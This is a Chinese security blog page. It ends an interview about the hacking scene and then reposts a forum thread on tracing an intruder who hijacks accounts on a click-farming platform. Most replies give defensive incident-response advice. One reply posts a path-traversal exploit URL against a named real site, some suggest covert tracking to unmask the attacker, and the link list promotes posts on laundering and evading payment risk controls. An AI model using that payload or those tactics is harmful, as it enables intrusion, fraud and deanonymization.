任何行业都有安全事故，控制在安全的度里即可。 /p p style="text-indent:2em;" 网络安全近几年由于媒体热炒，再加上技术广泛化，就暴露很多问题了，等过了这个时期，全民安全水平提高，就不会有那么多安全问题了。 /p p style="text-indent:2em;" 2.对现在的国内安全现状和未来的趋势有什么见解？ /p p style="text-indent:2em;" 国内安全现状嘛，个人感觉很混乱，毕竟是一个新兴的行业，还没有发展出自己的规则。未来应该会整合、规则化。 /p p style="text-indent:2em;" 3.国内外的企业应该怎么样避免这些事件的再次发生？ /p p style="text-indent:2em;" 对企业接触不多，不敢妄下评论。但肯定要学习经验、亡羊补牢。 /p p style="text-indent:2em;" 4.对黑产和白帽子的看法是什么？ /p p style="text-indent:2em;" 两者本质没有区别，都是靠技术生存，只是途径不一样。 /p p style="text-indent:2em;" 5.您能否从自己的角度说下现今国内黑产现状与模式以及未来的发展趋势？ /p p style="text-indent:2em;" 这个问题太大，就我个人观点，现在国家政策等原因，未来小鱼小虾会消失，只留下大玩家继续玩，手段也会更隐蔽，但永远都不会消失。 /p p style="text-indent:2em;" 6.有人说黑客圈技术环境变了，在你看来之前的环境是怎么样的，现在的环境是怎么样的？ /p p style="text-indent:2em;" 改变是肯定的，前几年行业新兴，泡沫太大，普遍浮躁，现在泡沫基本消散了，也都静下心了。 /p p style="text-indent:2em;" 7.健康的技术环境应该是怎么样的？ /p p style="text-indent:2em;" 那要看你如何定义“健康”了。 /p p style="text-indent:2em;" 8.黑客需要一个什么样的环境？国家，企业，社会，媒体，个人应该怎么做？ /p p style="text-indent:2em;" 嗯，无限零食供应，超高配置设备，舒适的工作环境，几个极品妹纸助手，嗯，一定是这样的环境！ /p p style="text-indent:2em;" 国家，出台政策，使它逐渐正规化，像过渡到白帽子一样，合法的研究技术。 /p p style="text-indent:2em;" 企业，正视自身网络安全问题，加强自身防范，而不是单方面指责黑客行为。 /p p style="text-indent:2em;" 媒体，合理引导社会舆论。 /p p style="text-indent:2em;" 个人，转职…… /p p style="text-indent:2em;" 9.在安全行业百家争鸣的时代，核总最看好的是哪个方向呢？大数据安全分析？威胁情报？可视化安全？or等等。核总怎么看？ /p p style="text-indent:2em;" 每个方向都各有所长、各有优缺，不能进行简单比较。 /p p style="text-indent:2em;" 我觉得未来大数据分析预测，应该是主流方向。 /p p style="text-indent:2em;" 这里说的不是这些企业搞得那些“概念大数据”，而是将整个社会各行各业数据进行整合分析，虚拟一个世界运行，预测未来发生的事，就像《美国队长》中的洞察计划、《少数派报告》一样，预测犯罪、事故、灾难的发生，并将其消灭在萌芽中，这是很有价值也是很恐怖的一件事。 /p p style="text-indent:2em;" 咳！扯远了…… /p p style="text-indent:2em;" 10.关于信息安全这个行业，核总毕竟也是行业大佬了，眼光肯定很独到，就近几年来看，安全产业发展得也算挺红火，市场需求量也在逐渐增加，政府和大众的重视程度也在提升，这是否就意味着安全行业的未来发展形势会很好，不会受到传说中的互联网寒冬的影响？ /p p style="text-indent:2em;" 这个问题很难回答，我等屌丝也无法预测这类问题。 /p p style="text-indent:2em;" 安全行业是基于企业安全需求的，企业有需求就不会有寒冬，安全行业是个新兴行业，还在发展中，很难预料。 /p p strong【4】对将要踏入信息安全行业的新朋友们提一些建议/strong /p p style="text-indent:2em;" 1.针对现今网络安全人士，会点渗透，刚大学毕业，开口就要15-40k月薪的看法。小伙伴们毕业没多久，经验不足。但是开口就是几十几十k的要，真敢开口啊。互联网安全行业现在就是泡沫行业吗？有一天会突然一下的破了吗？那些没有CISSP，CISP，CISA，Security+ 等等的人，没工作过，以前都是玩CTF长大的孩子们，他们哪里来的勇气？就敢狮子大开口？希望核总发表下核心建议。我们这年头，做安全行业的招聘也好难啊。 /p p style="text-indent:2em;" 无论哪个行业，都不缺刚毕业狮子大开口的愣头青。 /p p style="text-indent:2em;" 很少在安全公司混，这个我没有发言权，就不瞎指点了。 /p p style="text-indent:2em;" 嗯，我也没有那些证。亲，我高中都没毕业，贵公司要吗？ /p p style="text-indent:2em;" 2.渗透工程师行业将来的前景如何？核总能否就渗透相关的职业发表些看法。比如做安全服务（乙方）的，做某产的，成为某家公司的安全团队做维护该公司安全问题（算安全运维了？）的，以及为政府效力做境外目标的。就渗透而言，表弟见识短浅，觉得基本也就这几个职业了（求指点）？然后这些职业分别的优劣在哪些地方？ /p p style="text-indent:2em;" 没在乙方待过，听乙方朋友们说，貌似都很累、甲方都很操蛋，想打人，俩字：蛋疼。 /p p style="text-indent:2em;" 某产么，靠实力吃饭，金子满地有，看你有没有本事活着带出来。现在政策越来越严，估计死的人更多了吧。行业整体呈现龟缩状态，将面临新一轮的洗牌。 /p p style="text-indent:2em;" 安全运维么，没待过，感觉相对乙方应该轻松点，据说是祖传背锅的。 /p p style="text-indent:2em;" 国家队，也没待过，涉密单位，进去的朋友再也没出来过，人间蒸发了，嘘~ /p p style="text-indent:2em;" 3.觉得渗透火候差不多了，想要接着提升安全技术，避免不走弯路的路该怎么走呢（下一阶段学啥最靠谱）？ /p p style="text-indent:2em;" 学着如何防御被渗透，将会接触更多知识面，碰到更复杂困难的问题。 /p p style="text-indent:2em;" 4.荐一些性价比高或者值得拥有的技术方面的书吧，越多越好哈哈。以及核总涉猎的方面的内容简单说一下，对于技术应该怎么学习？ /p p style="text-indent:2em;" 这些年基本没看书，有问题直接百度、谷歌，所以不知如何推荐。 /p p style="text-indent:2em;" 学习技术，面很广，我感觉，挑自己感兴趣的方向入手即可，兴趣是学习的动力！ /p p style="text-indent:2em;" 5.有时候会不会觉得搞安全是一个坑？刚开始学习安全需要实践，但是现实是没有什么好的测试环境供大家实践，只有到处找SQL注入点，到处找XSS点，各种洞，各种点，以求技术上有所突破，但这样有可能会惹上官司，搞不好还要进去蹲上两年，安全处处充满坑，请问核总如何看待？ /p p style="text-indent:2em;" 嗯，所以我转职做食品行业了……　-_-!!! /p p strong【5】朋友眼中的核攻击/strong /p p style="text-indent:2em;" 这个看文章发布后的评论就知道了…… /p p style="text-indent:2em;" 摘录部分： /p p style="text-indent:2em;" depycode：核总为人很稳重，很有大哥气质。技术很扎实，涉猎广泛深入。从他博客学到很多东西，很感谢核总。 /p p style="text-indent:2em;" 耶稣：喜欢研究东西，，非常低调，知识非常的全面，在他的博客上面学习到了不少的经验，都是他认真思考后发的，可以学到很多。 /p p style="text-indent:2em;" lmy：核大大是一个很有趣的胖子，身边美女众多……此处省略一万字，重点是软硬都精，软到分分钟来场核风暴，硬到分分钟让你车熄火…借此也感谢核大大帮兄弟解决不少头疼问题… /p p style="text-indent:2em;" cond0r：性格比较严肃，不容易接近，但是在技术方面很有钻研精神，有什么问题总要研究出一个所以然来，也乐意分享。 /p p style="text-indent:2em;" T00ls.Net 评论：a href="https://www.t00ls.net/thread-32390-1-1.html" target="_blank"https://www.t00ls.net/thread-32390-1-1.html/a /p p style="text-indent:2em;" FreeBuf.COM 评论：a href="http://www.freebuf.com/news/89379.html" target="_blank"http://www.freebuf.com/news/89379.html/a /p pstrong留言评论（旧系统）：/strong/p div style="max-height:600px;width:100%;overflow:auto;overflow-x:hidden;" blockquote id="8062,4582,43.226.121.13" p失名 @ 2015-12-14 18:47:04/p p style="text-indent:2em"看到核总的专访了，特地发来贺电 ╮(╯▽╰)╭/p p本站回复：/p p style="text-indent:2em"感谢！感谢！！！/p /blockquote blockquote id="8068,4582,106.186.115.133" p佚名 @ 2015-12-16 16:13:09/p p style="text-indent:2em"核总威武，以核总为方向，努力ing.../p p本站回复：/p p style="text-indent:2em"加油！/p /blockquote blockquote id="8069,4582,203.100.94.151" p0xLucifer @ 2015-12-16 16:44:30/p p style="text-indent:2em"0xLucifer发来贺电！/p p本站回复：/p p style="text-indent:2em"感谢！/p /blockquote blockquote id="8071,4582,14.215.76.1" pdelectate @ 2015-12-16 19:59:50/p p style="text-indent:2em"《黑X》早就没了，《黑防》最早还分两册，现在也停刊了貌似（电子版也不出了），纸质版只收藏到2010-06。这条路，不好走。/p p本站回复：/p p style="text-indent:2em"是滴 +1/p /blockquote blockquote id="8073,4582,14.23.48.235" p佚名 @ 2015-12-17 12:04:27/p p style="text-indent:2em"核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总核总/p p本站回复：/p p style="text-indent:2em"-_-!!!/p /blockquote blockquote id="8075,4582,106.39.47.162" pUnicorn @ 2015-12-17 18:54:35/p p style="text-indent:2em"正是因为对自己变态的要求，才造就了自己的现在，做！就要做第一！我们现在还很年轻，人生的轨迹，也才刚刚开始。这个世界，从来就没有什么公正、平等！既然没有含着金汤勺出生，就更要付出常人千倍、万倍的努力！在自己的道路上，谱写自己的传奇！ --这段话振聋发聩！前辈，学习了！/p p本站回复：/p p style="text-indent:2em"good good study, day day up!/p /blockquote blockquote id="8080,4582,119.145.202.150" p佚名 @ 2015-12-18 17:09:51/p p style="text-indent:2em"核总威武，我以为你自己给自己做的专访呢。。。/p p本站回复：/p p style="text-indent:2em"-_-!!!/p /blockquote blockquote id="8081,4582,58.61.235.226" payiis @ 2015-12-18 21:53:32/p p style="text-indent:2em"核总，核大，蛋大，JB大，haha/p p本站回复：/p p style="text-indent:2em"同大、同大！-_-!!!/p /blockquote blockquote id="8082,4582,117.12.153.56" pJoyce @ 2015-12-18 21:54:59/p p style="text-indent:2em"核总威武/p p本站回复：/p p style="text-indent:2em"感谢！/p /blockquote blockquote id="8087,4582,58.241.42.83" p佚名 @ 2015-12-22 16:05:44/p p style="text-indent:2em"看了核总的经历好励志！祝核总早日结婚，早生贵子！！！！！！！！！！！！！！！！！！！！！！！！！！/p p本站回复：/p p style="text-indent:2em"感谢支持！/p /blockquote blockquote id="8089,4582,106.59.224.168" p佚名 @ 2015-12-22 19:19:59/p p style="text-indent:2em"请在这里填写留言内容，最长不超过 1000 字。/p p本站回复：/p p style="text-indent:2em"[暂无回复]/p /blockquote blockquote id="8091,4582,123.56.128.44" pSany @ 2015-12-22 23:52:54/p p style="text-indent:2em"坚持就是胜利，谢谢分享经历。/p p本站回复：/p p style="text-indent:2em"感谢！/p /blockquote blockquote id="8096,4582,112.92.70.147" p佚名 @ 2015-12-26 11:20:27/p p style="text-indent:2em"贺电贺电，就差你被神化了/p p本站回复：/p p style="text-indent:2em"-_-!!!/p /blockquote blockquote id="8102,4582,10.116.98.82" pNEUIN @ 2015-12-31 00:34:51/p p style="text-indent:2em"同在荣誉会员群，当时测试过你那网吧写的远程软件，你啥时候把我删了。/p p本站回复：/p p style="text-indent:2em"QQ人太多，定期清理。/p /blockquote blockquote id="8104,4582,117.63.36.56" plotion @ 2016-01-02 10:07:27/p p style="text-indent:2em"我们特别像啊~~~~/p p本站回复：/p p style="text-indent:2em"与君共勉！/p /blockquote blockquote id="8106,4582,112.44.202.48" pwormfox @ 2016-01-03 19:17:24/p p style="text-indent:2em"很多相同的经历！/p p本站回复：/p p style="text-indent:2em"与君共勉！/p /blockquote blockquote id="8107,4582,171.221.24.102" p哈哈 @ 2016-01-04 23:07:10/p p style="text-indent:2em"跟核总有过一些相似的经历，我几年前就转行了，转玩金融了.......但还是默默关注安全这行业。。。。。。。。。。/p p本站回复：/p p style="text-indent:2em"哈哈哈，你转行的早！！与君共勉！/p /blockquote blockquote id="8113,4582,119.78.214.36" p烟头 @ 2016-01-10 21:52:51/p p style="text-indent:2em"网吧一样的经历，验证码很操蛋你知道么/p p本站回复：/p p style="text-indent:2em"-_-!!!/p /blockquote blockquote id="8125,4582,117.172.27.118" p拉拉 @ 2016-01-16 20:33:21/p p style="text-indent:2em"哈哈哈哈哈两个无关紧要的问题 1、课桌上的初中《信息技术》已快被翻烂，里边写满了各种笔记以及自己的心得体会，还在空白处手算二进制、八进制、十进制、十六进制，估计全校就我一个这么干吧，其他人都撕了折飞机…… 现在看来没什么但当时同学有没有觉得你很装之类的啊。 2、从此一发不可收拾，什么《黑客X档案》、《黑客防线》、《黑客手册》、《大众电脑》之类的每周必买，当时只有一个报刊亭卖，每次还只有两三本，去迟了就没了！有没有知道买这些书其他几个人去干什么了/p p本站回复：/p p style="text-indent:2em"1、想己所想，做己所做；旁人想法，不曾注意。 2、城镇很小，高手寥寥，想必都拿去擦屁股了……/p /blockquote blockquote id="8141,4582,112.80.217.106" pCoreFish @ 2016-01-30 10:39:49/p p style="text-indent:2em"有着一段与何总相仿却还没书写完整的经历，之所以这么说是因为现正处于核总用VB编写“Hello World”的年龄，却有着核总许多的后续经历，看完文章激励人心，希望能往核总的方向发展吧。/p p本站回复：/p p style="text-indent:2em"与君共勉！/p /blockquote blockquote id="8142,4582,122.96.28.80" pCoreFish @ 2016-02-01 11:54:00/p p style="text-indent:2em"心无所妄，心落于实，想己所想，做己所做，如其所是，非己所想，不忘初心，方得终始。/p p本站回复：/p p style="text-indent:2em"大师！/p /blockquote blockquote id="8143,4582,112.250.55.46" p尼古拉斯赵四 @ 2016-02-01 18:41:41/p p style="text-indent:2em"我点一个赞，给99分，一分用666的形式给楼主，避免楼主傲娇以后不更新博客。/p p本站回复：/p p style="text-indent:2em"你赢了！　-_-!!!/p /blockquote blockquote id="8161,4582,118.77.246.171" p小成 @ 2016-02-25 14:21:33/p p style="text-indent:2em"小成致核电，哈哈哈，觉得差不多的人，这不是你们特么高中辍学的理由。我不是针对谁，我只想说，在座的各位。。。/p p本站回复：/p p style="text-indent:2em"-_-!!!/p /blockquote blockquote id="8167,4582,14.215.167.227" p某站长 @ 2016-03-03 23:12:06/p p style="text-indent:2em"哎，当年拿着自己的红包钱去买了5块的虚拟主机然后搞了一个com域名然后办了一个论坛,之后因为穷的问题关站。现在想起来当初的论坛真垃圾。/p p本站回复：/p p style="text-indent:2em"-_-!!!/p /blockquote blockquote id="8175,4582,111.37.1.56" p来自某大学的大二屌丝 @ 2016-03-07 18:13:16/p p style="text-indent:2em"小时候和你一样，很喜爱电脑一年级接触，四年级时在机房百度查询了杀进程代码，还查询了注册表找到卸载密码，自己电脑上安上了教室客户端。。。。。各种关机。。。。后来可能我在家里生活得太安逸，木有像您这样坚持下去。。。。。。/p p本站回复：/p p style="text-indent:2em"-_-!!!/p /blockquote blockquote id="8176,4582,27.42.106.219" pzdir @ 2016-03-07 21:41:48/p p style="text-indent:2em"挺励志，我不会放弃./p p本站回复：/p p style="text-indent:2em"感谢支持！与君共勉！/p /blockquote blockquote id="8177,4582,220.168.204.130" pMonster @ 2016-03-07 21:46:40/p p style="text-indent:2em"核总，请问你当网管的时候，一天睡多少小时啊我擦，我现在跟核总的情况差不多，高中喜欢上了黑客技术，一直在坚持，真的非常着迷。我现在也在一家网吧也当网管，的确网吧的环境很难让人静下心来学习，，，/p p本站回复：/p p style="text-indent:2em"七八个小时吧~与君共勉！/p /blockquote blockquote id="8185,4582,113.83.194.140" p佚名 @ 2016-03-15 23:13:06/p p style="text-indent:2em"核总已经2016年了，还没老婆和情人吗？/p p本站回复：/p p style="text-indent:2em"你猜~/p /blockquote blockquote id="8187,4582,218.76.128.58" pAny3ite @ 2016-03-18 15:01:48/p p style="text-indent:2em"什么时候这个验证问题怎么还出现这 18、注销已登录用户的命令是？ [换一个] [找答案] 介意添加点关于男人都懂的知识么？/p p本站回复：/p p style="text-indent:2em"你赢了……　-_-!!!/p /blockquote blockquote id="8198,4582,1.86.29.159" p黑鸡 @ 2016-03-29 13:56:50/p p style="text-indent:2em"你好蛋疼/p p本站回复：/p p style="text-indent:2em"啊/p /blockquote blockquote id="8238,4582,180.111.133.193" pSovi @ 2016-04-26 00:56:13/p p style="text-indent:2em"核总，咱俩经历挺像的/p p本站回复：/p p style="text-indent:2em"与君共勉！/p /blockquote /div

讨论：网站遇黑阔，求分析思路查身份～逆向追踪黑客、溯源分析

Nuclear'Atk（核攻击）网络安全实验室

2015年11月4日 15:03

p style="text-indent:2em;" 网站遇黑阔，求分析思路查身份～ /p p style="text-indent:2em;" zone | 2015-11-03 00:04 /p p style="text-indent:2em;" 朋友的一个刷单平台最近遇到一黑阔，损失了不少，找我帮忙，也没啥好主意，唉~_~ /p p style="text-indent:2em;" 各位大神快来给点建议分析分析～ /p p style="text-indent:2em;" “一个刷单平台网站，分为商家和刷手，刷手通过平台给商家做任务。10月份，就出现，黑客登录到刷手的账号，给商家做任务，是远程付款任务，就是商家在刷手的电脑进行付款，黑客以刷手的身份，让商家在自己电脑上付款，然后达成远程钓鱼的目的。付款的时候，直接伪造付款页面，将钱转走。后来，我在平台上规定，商家在和刷手接洽的时候，必须核对QQ，就是商家必须和刷手本人的QQ聊天，才能做任务，否则被骗不负责，后来骗子感觉骗不了了，就开始利用黑客技术，修改刷手会员信息的QQ账号，将QQ改成自己的，然后冒充刷手做任务。 /p p style="text-indent:2em;" 这几天，通过调取10月份之前的会员QQ信息和10月份的QQ信息，进行比对，发现一些QQ号在10月份被修改过，今天把被改过QQ的这些刷手账号封了。以免黑客登录这些账号行骗。但是晚上，很意外的是，上午封的账号，黑客晚上竟然解封了，依旧照常到里面接任务行骗。 /p p style="text-indent:2em;" 基本情况就是这样，现在黑客，能修改会员密码，能修改会员QQ号，还能将管理员封的账号解封。 /p p style="text-indent:2em;" ” /p p style="text-indent:2em;" 不知这位黑阔是只能上后台，还是已经拿下服务器了，朋友说安全狗没查出什么出来，上后台的话，如果有xss也许就能很轻易进去了。 /p p style="text-indent:2em;" 现在的问题是，可不可以通过一些技术手段，找出这位黑阔的真实身份，让平台避免损失，求姿势～ /p p style="text-indent:2em;" （我想的是能不能在黑阔登陆的帐户上，做些手脚，比如插入一段lt;embed/src=//小号qq空间gt;，记录访客，查真实qq。。。）再社工。 /p p style="text-indent:2em;" 已知：黑阔作案qq通常是小号，多次登陆ip显示为江苏徐州的。 /p p style="text-indent:2em;" ～～我怎么感觉有种侦探小说的赶脚。 /p p style="text-indent:2em;" a href="http://zone.wooyun.org/content/23717" target="_blank"[原文地址]/a /p p strong各种吐槽：/strong /p p style="text-indent:2em;" 1# /p p style="text-indent:2em;" h3hz | 2015-11-03 01:05 /p p style="text-indent:2em;" 还真是逗智逗勇啊，我怎么感觉黑阔有数据库权限，换个后台，改下数据库密码，找出黑阔怎么日进来的蛛丝马迹 /p p style="text-indent:2em;" 2# /p p style="text-indent:2em;" 麦兜 (麦兜爱吃苹果) | 2015-11-03 01:25最佳答案 /p p style="text-indent:2em;" strongspan style="color:#006600;"1,修改所有有解封权限用的密码，全部用明文加md5，看是否还有这样的情况，如果还有，说明漏洞不在用户密码，可能是xss或者sql/span/strong /p p style="text-indent:2em;" strongspan style="color:#006600;"2,登录后台，前台，抓包，一个一个的验证，看是否有访问非正常url,如果有可能是xss/span/strong /p p style="text-indent:2em;" strongspan style="color:#006600;"3，注入漏洞就只能看日志了，web日志，数据库日志/span/strong /p p style="text-indent:2em;" strongspan style="color:#006600;"4，如果被拿了webshell也只能从日志分析了。D蹲可以扫一扫，/span/strong /p p style="text-indent:2em;" strongspan style="color:#006600;"5，服务器端口漏洞，这个就要具体看了，关闭所有端口，只开放80对外访问，注意检测弱密码ftp,ssh.telnet,rdp,mysql,mssql,web(80,8080等)/span/strong /p p style="text-indent:2em;" strongspan style="color:#006600;"6，看你是否有备份，优化维护后直接回复，记得开日志/span/strong /p p style="text-indent:2em;" 3# /p p style="text-indent:2em;" 麦兜 (麦兜爱吃苹果) | 2015-11-03 01:27 /p p style="text-indent:2em;" 你装了安全狗，有防注入，一般在检测sql注入的时候可能会被狗拦截，你可以对应安全狗的注入日志，对应的找 /p p style="text-indent:2em;" 4# /p p style="text-indent:2em;" 围剿 (七月流火，八月未央，九月白露凝成轻霜) | 2015-11-03 08:06 /p p style="text-indent:2em;" @麦兜 666 /p p style="text-indent:2em;" 5# /p p style="text-indent:2em;" 随风的风 (静，已修身) | 2015-11-03 08:14 /p p style="text-indent:2em;" @麦兜 666 专业啊 /p p style="text-indent:2em;" 6# /p p style="text-indent:2em;" 纷纭 (:-)) | 2015-11-03 08:30 /p p style="text-indent:2em;" 查看web 日志~~ /p p style="text-indent:2em;" 7# /p p style="text-indent:2em;" 齐迹 (sec.zhubajie.com 欢迎来撸) | 2015-11-03 08:53 /p p style="text-indent:2em;" 万一是逻辑漏洞呢？任意密码重置在wooyun上已经不计其数了。 /p p style="text-indent:2em;" 还有越权修改资料什么的。 /p p style="text-indent:2em;" 这些在NB的软件都无法检查的。 /p p style="text-indent:2em;" 8# /p p style="text-indent:2em;" 一只猿 (专注无线电与硬件安全) | 2015-11-03 09:02 /p p style="text-indent:2em;" 搞个蜜罐 /p p style="text-indent:2em;" 9# /p p style="text-indent:2em;" Hckmaple | 2015-11-03 09:09 /p p style="text-indent:2em;" @麦兜分析透彻！666 /p p style="text-indent:2em;" 10# /p p style="text-indent:2em;" 大漠長河 (专注智能家居与硬件防火墙) | 2015-11-03 09:11 /p p style="text-indent:2em;" @一只猿高论 /p p style="text-indent:2em;" 11#感谢(1) /p p style="text-indent:2em;" newline | 2015-11-03 09:21 /p p style="text-indent:2em;" 第一时间下线应用，如果是VPS，把VPS系统加应用打包刻到盘或者转移到移动硬盘，挪到一个断网环境，先审计一遍日志， find查找触点信息，比如shell, sqlinjection, xss类的问题触点，如果可以找到，就去复现，可以复现的话就对其进行修复然后继续下一步审计，如果找不到，就应该从客户端边界开始审计，检查客户端边界用户可控变量，可控参数，是否存在变量型的注入，保存型amp;反射xss? 然后是服务器端脚本(身份验证用的是哪些方式，是否存在验证不全，验证绕过，验证信息泄露，逻辑错误问题？会话管理是用的哪些方式，是否存在可猜测，可以被暴力，或者单纯的使用一种方式进行会话管理？典型的就是没有token,访问控制采用了哪些手段，验证的完整吗？) 把服务器端脚本的这些问题检查清楚后下面可以做一个代码审计，主要是sql注入，命令执行，文件包含，任意文件上传，变量覆盖导致的各种问题，xss, csrf,各种逻辑问题这些，把应用层的问题基本都撸清楚后，对它们进行一一修复，修复后，继续检查服务器端平台，检查是否被放了木马，启动项是否异常， explorer是否被插了dll,是否有异常服务，是否有异常文件，如果是linux/unix 可以扫一扫有没有rootkit,有没有对外发包的程序在跑，不管是windows下的还是linux unix下的，检查到后对其进行一一删除，删除完后，可以对平台和应用进行一次安全加固，如果你使用的是apache mysql apache下的httpd.conf mysql下的my.ini 如果还有php就是php下的php-apache2handler.ini 这个名字具体要根据版本，不是固定的，从这些文件里可以对apache,mysql,php进行一下安全加固，比如禁用函数，限制目录等等这些，详细的可以自己百度，完了后可以对系统平台进行一下加固，比如删除不用的帐号，删除一些命令执行通道，(wsshell, cmd,)或者改名，对负责倒入倒出的dll降权，等等，这些公开环境也有资料，把客户端边界，服务器端脚本，服务器端应用平台，服务器端自身平台都加固完了后，可以上个防火墙，弄个监控啥的，基本就没什么问题了。 /p p style="text-indent:2em;" 12# /p p style="text-indent:2em;" newline | 2015-11-03 09:27 /p p style="text-indent:2em;" 我上面说的审计流程和方法只是说了个大概，全部包括并不是只有这些，你可以结合你所了解的和你的基础进行。 /p p style="text-indent:2em;" 13# /p p style="text-indent:2em;" hkAssassin | 2015-11-03 09:57 /p p style="text-indent:2em;" 找我，我去抓~~~说那么多有毛用，搞业务之前为什么不想想会被黑掉。就算没有一个全职的安全人员，也得找一个兼职的吧！出问题了自己不查，让你来这里问，你觉的大家说的你能用么？（这就是不重视安全的后果）最好的建议就是钱给到位，找人直接去查，我相信，能出来你期待的结果~~~~ /p p style="text-indent:2em;" 14# /p p style="text-indent:2em;" July | 2015-11-03 10:14 /p p style="text-indent:2em;" 后台管理地址主页(index default )解析插入流量统计代码,原来解析文件更名;如果没有统计到第三者或许他已经有服务器权限。 /p p style="text-indent:2em;" 如果是IIS的话后台管理地址,做个IIS访问认证,如果网站还出现异常说明要查shell 服务器后门逻辑漏洞之类的了。 /p p style="text-indent:2em;" 15# /p p style="text-indent:2em;" Dream° | 2015-11-03 10:39 /p p style="text-indent:2em;" 在网站上面加上来访电脑QQ记录然后比对时间进行排查黑客操作那个时段的QQ 一般黑客嘛取名都有点另类还是比较容易的@zone /p p style="text-indent:2em;" 16# /p p style="text-indent:2em;" Dream° | 2015-11-03 10:42 /p p style="text-indent:2em;" 私密我QQ 可以帮你在试试@zone /p p style="text-indent:2em;" 17# /p p style="text-indent:2em;" 独臂刀王 | 2015-11-03 10:58 /p p style="text-indent:2em;" 一直我都是伪造金额体现的，，， /p p style="text-indent:2em;" 18# /p p style="text-indent:2em;" zone | 2015-11-03 11:03 /p p style="text-indent:2em;" 感谢诸位的建议～多谢啦：） /p p style="text-indent:2em;" 19# /p p style="text-indent:2em;" 这只猪 (会拱白菜) | 2015-11-03 11:31 /p p style="text-indent:2em;" 估计是网站源码泄露了，然后被脸上了数据库操作的。 /p p style="text-indent:2em;" 20# /p p style="text-indent:2em;" 地瓜 (此处内容为隐藏内容，点击感谢即可查看此内容) | 2015-11-03 15:08 /p p style="text-indent:2em;" 安全狗安全宝D盾 /p p style="text-indent:2em;" 21# /p p style="text-indent:2em;" 小表哥 | 2015-11-03 15:10 /p p style="text-indent:2em;" 我想知道你找到哪位黑客怎么处理？损失了没想过报警，自己找出来。。。你是想打他一顿么？？ /p p style="text-indent:2em;" 22# /p p style="text-indent:2em;" zone | 2015-11-03 15:31 /p p style="text-indent:2em;" @小表哥 haha 不是不是，觉得值得一提，就是发出来，看看有什么好建议学习学习~ 关键是别让朋友平台在损失了，至于找出那个黑阔，只是我自己脑洞一开，看看有什么姿势，~比如 @一只猿说的蜜罐~怎么做？囧 /p p style="text-indent:2em;" 23# /p p style="text-indent:2em;" 小表哥 | 2015-11-03 15:37 /p p style="text-indent:2em;" @zone 既然知道他改过的qq，那你就冒充商家去发任务，搞到钓鱼平台然后搞啊 /p p style="text-indent:2em;" 24# /p p style="text-indent:2em;" zone | 2015-11-03 15:54 /p p style="text-indent:2em;" @小表哥他的都是小号，这里是刷手选商家，先刷后付款，这里冒充有难度啊。然后，钓鱼平台搞什么？钓QQ号？ /p p style="text-indent:2em;" 25# /p p style="text-indent:2em;" LaTCue (善养人妻。) | 2015-11-03 16:35 /p p style="text-indent:2em;" http://www.diyishuadan.com/ 第一刷单? 如果是这个的话我可以告诉你漏洞是DX插件包含直接getshell /p p style="text-indent:2em;" http://www.diyishuadan.com/plugin.php?action=../../../../../robots.txt%00amp;id=dc_mall /p p style="text-indent:2em;" 26# /p p style="text-indent:2em;" zone | 2015-11-03 16:39 /p p style="text-indent:2em;" @LaTCue 不是奥 /p p style="text-indent:2em;" 27# /p p style="text-indent:2em;" a href="https://lcx.cc/" target="_blank"核攻击/a (统治全球，奴役全人类！毁灭任何胆敢阻拦的有机生物！) | 2015-11-04 14:42 /p p style="text-indent:2em;" “黑客以刷手的身份，让商家在自己电脑上付款，然后达成远程钓鱼的目的。付款的时候，直接伪造付款页面，将钱转走” /p p style="text-indent:2em;" 太有才了。。 /p p strong相关内容：/strong /p p style="text-indent:2em;" a href="https://lcx.cc/post/4557/" target="_blank"北京NDS公司工程师攻击46万台机顶盒传播反动信息获刑12年/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/4555/" target="_blank"反黑逆向溯源追踪之：某某某局入侵事件分析/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/4490/" target="_blank"JS绕过代理、VPN获取真实IP及内网IP，逆向追踪/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/4479/" target="_blank"简单获取CDN背后网站的真实IP，CDN逆向，反向跟踪网站真实IP/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/4444/" target="_blank"JSON探针—定位目标网络虚拟信息身份，利用大量三方网站cookie进行追踪/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/4397/" target="_blank"社会工程学追踪妻子花6万挖出小三给60多个号充话费锁定4人/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/4396/" target="_blank"逆向追踪一起针对国内企业OA系统精心策划的大规模钓鱼攻击事件/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/4391/" target="_blank"警察说：电话诈骗中，骗子存在哪些漏洞/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/4390/" target="_blank"渗透道哥的黑板报里那个骗子网站，入侵电话诈骗的骗子网站/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/4389/" target="_blank"同事亲历的一次电话诈骗/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/4388/" target="_blank"【警惕】一个神秘电话，工商银行卡内余额不翼而飞！网银诈骗！/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/4383/" target="_blank"论黑产黑阔如何安全地转移赃款/洗钱？/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/4375/" target="_blank"论匿名转帐和转移资产的可能，如何：网络匿迹、匿名洗钱、转移资产系统/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/4374/" target="_blank"跨行、跨省银行卡间转账不用手续费？利用支付宝为什么不收手续费？/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/4340/" target="_blank"如果躲开支付宝风险监控，何才能做到不违反支付宝风控条件呢？/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/4320/" target="_blank"网络匿迹、逆向追踪：关于那些做H站的人，是怎么落网的？/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/4310/" target="_blank"APT攻击：境外间谍“飞哥”假扮女网友策反境内人员窃取中国军事秘密/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/4308/" 